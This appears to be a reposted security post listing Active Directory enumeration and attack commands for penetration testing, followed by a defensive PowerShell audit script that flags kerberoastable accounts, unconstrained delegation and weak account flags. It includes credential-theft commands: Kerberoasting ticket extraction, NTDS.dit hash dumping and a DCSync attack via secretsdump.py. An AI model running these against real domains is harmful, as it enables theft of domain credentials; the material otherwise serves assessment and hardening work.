Readable version: https://lnkd.in/e-6SBNM5
Now fully generated from markdown files: way easier to update and maintain!
Got improvements? PRs welcome! https://lnkd.in/eP-mb6nA
You Should Know:
Here are some practical Active Directory (AD) commands that can help you in penetration testing and red teaming:
1. Enumerate Domain Users:
Get-ADUser -Filter * -Properties SamAccountName,DisplayName,MemberOf
2. Check Domain Trusts:
Get-ADTrust -Filter *
3. List All Domain Controllers:
Get-ADDomainController -Filter *
4. Extract Password Policies:
Get-ADDefaultDomainPasswordPolicy
5. Find Users with SPN (Service Principal Name):
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
6. Kerberoasting Attack (Extract TGS Tickets):
GetUserSPNs.py -request -dc-ip <DC_IP> <DOMAIN>/<USER>
7. BloodHound Enumeration:
bloodhound-python -d <DOMAIN> -u <USER> -p <PASSWORD> -ns <DC_IP> -c All
8. Dump NTDS.dit for Password Hashes:
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
9. Check for Unconstrained Delegation:
Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation
10. Enumerate GPOs (Group Policy Objects):
Get-GPO -All
What Undercode Say:
Active Directory is a critical component in most enterprise environments, and understanding its intricacies is essential for both offensive and defensive cybersecurity professionals. The mindmap provided in the article is an excellent resource for visualizing AD concepts, especially for penetration testers and red teamers.
Here are some additional Linux and Windows commands to enhance your AD knowledge:
- Linux (Impacket Tools):
Enumerate SMB Shares:
smbclient -L //<TARGET_IP> -U <USER>
Perform a DCSync Attack:
secretsdump.py <DOMAIN>/<USER>:<PASSWORD>@<DC_IP>
- Windows (PowerShell):
Find Users with Admin Rights:
Get-ADGroupMember -Identity "Domain Admins"
Check for Password Not Required Accounts:
Get-ADUser -Filter {PasswordNotRequired -eq $true} -Properties PasswordNotRequired
For further reading, check out the official Microsoft documentation on Active Directory:
https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview
Mastering these commands and techniques will significantly improve your ability to assess and secure Active Directory environments. Keep practicing and stay updated with the latest tools and methodologies!
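The PowerShell checks from the numbered list and the extra Windows commands (accounts with SPNs, unconstrained delegation, PasswordNotRequired, Domain Admins membership) folded into one defender-side audit that returns findings with a suggested fix. This is an added example, not code from the original post; it assumes the RSAT ActiveDirectory module is installed, and the function name Invoke-AdExposureAudit is hypothetical.

```powershell
# Added example (not from the original post): one defender-side audit that runs the
# exposure checks listed above and returns findings as objects (pipe to Export-Csv).
# Assumes the RSAT ActiveDirectory module and a domain-joined, domain-user context.
Import-Module ActiveDirectory

function Invoke-AdExposureAudit {
    param([string]$PrivilegedGroup = 'Domain Admins')   # group reviewed in check 4

    $findings = New-Object System.Collections.Generic.List[object]
    function Add-Finding($Check, $Object, $Detail, $Mitigation) {
        $findings.Add([pscustomobject]@{ Check = $Check; Object = $Object
                                         Detail = $Detail; Mitigation = $Mitigation })
    }

    # 1. Kerberoastable accounts: user objects carrying an SPN. krbtgt is skipped
    #    (its SPN is expected); every other hit needs a gMSA or a long random password.
    Get-ADUser -Filter 'ServicePrincipalName -like "*"' -Properties ServicePrincipalName, PasswordLastSet |
        Where-Object { $_.SamAccountName -ne 'krbtgt' } |
        ForEach-Object {
            Add-Finding 'Kerberoastable SPN' $_.SamAccountName `
                ('SPNs: {0}; password last set {1}' -f ($_.ServicePrincipalName -join ', '), $_.PasswordLastSet) `
                'Convert to a gMSA or set a 25+ char random password; alert on TGS requests for this SPN.'
        }

    # 2. Unconstrained delegation on anything that is not a domain controller
    $dcs = (Get-ADDomainController -Filter *).Name
    Get-ADComputer -Filter { TrustedForDelegation -eq $true } -Properties TrustedForDelegation |
        Where-Object { $dcs -notcontains $_.Name } |
        ForEach-Object {
            Add-Finding 'Unconstrained delegation' $_.Name 'TrustedForDelegation set on a non-DC host' `
                'Move to resource-based constrained delegation; mark admins "sensitive, cannot be delegated".'
        }

    # 3. Accounts with the PasswordNotRequired flag (may legitimately have no password)
    Get-ADUser -Filter { PasswordNotRequired -eq $true } -Properties PasswordNotRequired |
        ForEach-Object {
            Add-Finding 'PasswordNotRequired' $_.SamAccountName 'UF_PASSWD_NOTREQD is set' `
                'Clear the flag (Set-ADUser -PasswordNotRequired $false) and force a password reset.'
        }

    # 4. Privileged group membership, resolved recursively so nested groups are not missed
    Get-ADGroupMember -Identity $PrivilegedGroup -Recursive | ForEach-Object {
        Add-Finding "Member of $PrivilegedGroup" $_.SamAccountName $_.objectClass `
            'Check against the approved admin list; prefer tiered, separate admin accounts.'
    }
    return $findings
}

Invoke-AdExposureAudit | Format-Table -AutoSize
```

Each finding maps back to one of the enumeration commands above, so the same queries an assessor runs become a repeatable posture check for the blue team.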
References:
Reported By: Cyril Servieres – Hackers Feeds